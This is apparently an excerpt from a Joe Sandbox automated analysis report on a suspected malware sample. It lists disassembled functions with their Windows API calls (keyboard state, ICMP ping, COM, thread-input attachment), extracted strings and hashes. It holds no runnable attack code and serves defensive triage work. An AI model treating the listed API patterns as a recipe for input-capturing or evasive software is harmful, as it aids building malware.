                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 78ce97c6894d074268003889a85e6fe107b873f452faad2f518254770b49fee2
                                      • Instruction ID: 8a97093899e5a2f557fb1d8ad318c4772e856e3b71af665ed46263556c2eb36f
                                      • Opcode Fuzzy Hash: 78ce97c6894d074268003889a85e6fe107b873f452faad2f518254770b49fee2
                                      • Instruction Fuzzy Hash: 1641D8746087DA6DFF30966688043F5BEA1FF13344F04805ADAC6D66C2DBE499C8C792
                                      Function 0090055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 009005BC
                                      • inet_addr.WS2_32(?), ref: 0090061C
                                      • gethostbyname.WS2_32(?), ref: 00900628
                                      • IcmpCreateFile.IPHLPAPI ref: 00900636
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009006C6
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009006E5
                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 009007B9
                                      • WSACleanup.WS2_32 ref: 009007BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 644c042c41665890f84e69ceae4ca63dd7ac9316b04fe1c1b8fca3e2ec6e400d
                                      • Instruction ID: 6889d271c61cac902fa9b7bb747e571e419061e093cf3b58a9666472f780ec58
                                      • Opcode Fuzzy Hash: 644c042c41665890f84e69ceae4ca63dd7ac9316b04fe1c1b8fca3e2ec6e400d
                                      • Instruction Fuzzy Hash: FA919C756082019FD720DF19C888F1ABBE5EF85318F1485A9F469CB6A2C734ED41CF92
                                      Function 00908CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 707087890-567219261
                                      • Opcode ID: 3129189ab3d7861b3bfa918206b3de4fd1b89a7bd36b5dd8ad0bf095372b5389
                                      • Instruction ID: c731d1378ba486d69c4d334ce7213fde2ee7f5da686464324c4df200772787d1
                                      • Opcode Fuzzy Hash: 3129189ab3d7861b3bfa918206b3de4fd1b89a7bd36b5dd8ad0bf095372b5389
                                      • Instruction Fuzzy Hash: E9519E32A005169ECF24EF6CC9409BFB7AABF65724B254629E4A6E72C0DB30DD40C791
                                      Function 0090372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32 ref: 00903774
                                      • CoUninitialize.COMBASE ref: 0090377F
                                      • CoCreateInstance.COMBASE(?,00000000,00000017,0091FB78,?), ref: 009037D9
                                      • IIDFromString.COMBASE(?,?), ref: 0090384C
                                      • VariantInit.OLEAUT32(?), ref: 009038E4
                                      • VariantClear.OLEAUT32(?), ref: 00903936
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      • Opcode ID: f3bbbb75518c3d37f3fb8d6f3ce763f9f88962db756d03a3fc1d74fe5de61874
                                      • Instruction ID: 56498e29ce1a667df6d40c47cac5c470a7059a703177730a2d54f2393d65918c
                                      • Opcode Fuzzy Hash: f3bbbb75518c3d37f3fb8d6f3ce763f9f88962db756d03a3fc1d74fe5de61874
                                      • Instruction Fuzzy Hash: E1619FB0608301AFD310DF64C889F6AB7E8FF89714F148949F9959B291D770EE48CB92
                                      Function 008EDC0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 008EDC50
                                      • _wcsstr.LIBVCRUNTIME ref: 008EDCA0
                                      • 74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008EDCBC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: D31560_wcslen_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2357346915-1459072770
                                      • Opcode ID: 6626be65097d378a19d5122fe0149744d181cd117063f87e40e8c76dba2567ef
                                      • Instruction ID: 3ba98d3dbc5957466184b73051b54acd8b547c829b24d3ab0a6bf41e523b017b
                                      • Opcode Fuzzy Hash: 6626be65097d378a19d5122fe0149744d181cd117063f87e40e8c76dba2567ef
                                      • Instruction Fuzzy Hash: 654104B2A843147BEB14A7699C07EFF77ACFF83750F140069F900E6182EA709901D6A6
                                      Function 008F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008F33CF
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008F33F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-3080491070
                                      • Opcode ID: 5159f8b47c05fb4923b120f1cae849543f72d20d8d0d152733013cb457659a20
                                      • Instruction ID: 8eb5a71031b9ec8a9da435fe0887b54c60064567f0a65b994cc224b25356c964
                                      • Opcode Fuzzy Hash: 5159f8b47c05fb4923b120f1cae849543f72d20d8d0d152733013cb457659a20
                                      • Instruction Fuzzy Hash: 0751667290020AAADF14EBA4DD46EFEB778FF59344F144065F105B20A2EB316F58DB62
                                      Function 008EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 1256254125-769500911
                                      • Opcode ID: a93511e934550e571e842c8c6931a97b5f78fd5f98744cbacfd1c0cb42a89007
                                      • Instruction ID: 9ff66d5c245e8cf05238c49be99afa34e6ee9066c553b34ecac62881b24ea287
                                      • Opcode Fuzzy Hash: a93511e934550e571e842c8c6931a97b5f78fd5f98744cbacfd1c0cb42a89007
                                      • Instruction Fuzzy Hash: CD41C772A041679BCB206F7E8C905BFBBA5FBB2754B244129E461D72A4F731CD81C790
                                      Function 008F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F53A0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008F5416
                                      • GetLastError.KERNEL32 ref: 008F5420
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 008F54A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: c55c0239118e840e276282d6a5a25c8d8e24d8e105562af0ac55fb29f1023214
                                      • Instruction ID: aede291c979f0d1050ca90a140ebc56cf6d3a936f2659332e7223101d1622e01
                                      • Opcode Fuzzy Hash: c55c0239118e840e276282d6a5a25c8d8e24d8e105562af0ac55fb29f1023214
                                      • Instruction Fuzzy Hash: C23191B5A046099FC710DF68C884ABABBB4FB15305F148069E605DB292D731DD86CBA1
                                      Function 00913C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMenu.USER32 ref: 00913C79
                                      • SetMenu.USER32(?,00000000), ref: 00913C88
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00913D10
                                      • IsMenu.USER32(?), ref: 00913D24
                                      • CreatePopupMenu.USER32 ref: 00913D2E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00913D5B
                                      • DrawMenuBar.USER32 ref: 00913D63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0$F
                                      • API String ID: 161812096-3044882817
                                      • Opcode ID: 54482a6bf649f098a55aa4e7c310559de5d966154c0f60902f0c851da0537640
                                      • Instruction ID: 4ae5af75d08841febed1446183c1c7a7de21166f052f178da29335af5eb4d10a
                                      • Opcode Fuzzy Hash: 54482a6bf649f098a55aa4e7c310559de5d966154c0f60902f0c851da0537640
                                      • Instruction Fuzzy Hash: D8418CB8A05209AFDB14CF64E844ADA77B9FF49314F148028F946973A0D730AA10DB90
                                      Function 00913A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00913A9D
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00913AA0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00913AC7
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00913AEA
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00913B62
                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00913BAC
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00913BC7
                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00913BE2
                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00913BF6
                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00913C13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: ea3af4fc3744880943329702e4baf3c488dc1faad86c03a7eec15fcf8efa1d2f
                                      • Instruction ID: 201f7018c45f08435cfeb111275fdaffc92e8616f275a4813c428defa1692a7c
                                      • Opcode Fuzzy Hash: ea3af4fc3744880943329702e4baf3c488dc1faad86c03a7eec15fcf8efa1d2f
                                      • Instruction Fuzzy Hash: 01618975A00208AFDB20DFA8CC81FEE77B8EB49714F104099FA15E72A1D774AE85DB50
                                      Function 008EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008EB151
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB165
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 008EB16C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB17B
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 008EB18D
                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1B8
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1FD
                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB212
                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB21D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: af2c79e0e7f99a1fc1e021c15991e8a1745b71e4f4e4f2634019c98c21f316ac
                                      • Instruction ID: 78b015e0c381c4fe2e05893eee211b1f311cb0fdde27bb4524dad0cf9c41de21
                                      • Opcode Fuzzy Hash: af2c79e0e7f99a1fc1e021c15991e8a1745b71e4f4e4f2634019c98c21f316ac
                                      • Instruction Fuzzy Hash: 1431A9B5668344BFDB109F26DC48BAE7BA9FF523A2F108009FA00D6190D7B49A00DF64
                                      Function 008B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 008B2C94
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008B2CA0
                                      • _free.LIBCMT ref: 008B2CAB
                                      • _free.LIBCMT ref: 008B2CB6
                                      • _free.LIBCMT ref: 008B2CC1
                                      • _free.LIBCMT ref: 008B2CCC
                                      • _free.LIBCMT ref: 008B2CD7
                                      • _free.LIBCMT ref: 008B2CE2
                                      • _free.LIBCMT ref: 008B2CED
                                      • _free.LIBCMT ref: 008B2CFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7782dd5c82580a8bed776dbce9ece1505cec16cb73ae0098da5a05c5ae6c7c81
                                      • Instruction ID: 85b8f11fa52c12336e2807cb1877395401715c35b398539a8f0add1f1a2ac2ff
                                      • Opcode Fuzzy Hash: 7782dd5c82580a8bed776dbce9ece1505cec16cb73ae0098da5a05c5ae6c7c81
                                      • Instruction Fuzzy Hash: A0116376500108BFCB02EF58D982DDD3FA9FF09350F5149A5FA489B322DA31EA549B91
                                      Function 00881410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00881459
                                      • OleUninitialize.OLE32(?,00000000), ref: 008814F8
                                      • UnregisterHotKey.USER32(?), ref: 008816DD
                                      • DestroyWindow.USER32(?), ref: 008C24B9
                                      • FreeLibrary.KERNEL32(?), ref: 008C251E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C254B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 56d54f5b065d297be5769bcc9ccd1e953516f1f30ff7b8904aaf061174721a04
                                      • Instruction ID: f13a35e9271b8a475c256355eec35a48025a35b0ac3d8a6fe79fe01e36624dcf
                                      • Opcode Fuzzy Hash: 56d54f5b065d297be5769bcc9ccd1e953516f1f30ff7b8904aaf061174721a04
                                      • Instruction Fuzzy Hash: 6AD113717012128BCB29EF19C899E69F7A4FF05714F1442ADE54AEB292DB30ED12CF51
                                      Function 00885BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00885C7A
                                        • Part of subcall function 00885D0A: GetClientRect.USER32(?,?), ref: 00885D30
                                        • Part of subcall function 00885D0A: GetWindowRect.USER32(?,?), ref: 00885D71
                                        • Part of subcall function 00885D0A: ScreenToClient.USER32(?,?), ref: 00885D99
                                      • GetDC.USER32 ref: 008C46F5
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008C4708
                                      • SelectObject.GDI32(00000000,00000000), ref: 008C4716
                                      • SelectObject.GDI32(00000000,00000000), ref: 008C472B
                                      • ReleaseDC.USER32(?,00000000), ref: 008C4733
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008C47C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: f8d98fdd888c841699b5a2417198f34adefbb5a10f3e25ff32984ab40eef8bad
                                      • Instruction ID: 28a1ba7f4a50442e6b3a9b4e991f32512952aea60fffc8346030c3f5928999ae
                                      • Opcode Fuzzy Hash: f8d98fdd888c841699b5a2417198f34adefbb5a10f3e25ff32984ab40eef8bad
